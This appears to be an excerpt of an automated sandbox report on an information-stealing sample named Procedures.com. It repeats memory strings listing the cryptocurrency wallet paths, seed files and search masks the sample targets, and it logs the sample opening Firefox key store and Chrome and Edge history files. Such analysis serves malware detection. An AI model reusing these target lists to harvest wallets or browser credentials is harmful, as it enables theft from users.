                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000408D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000408D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
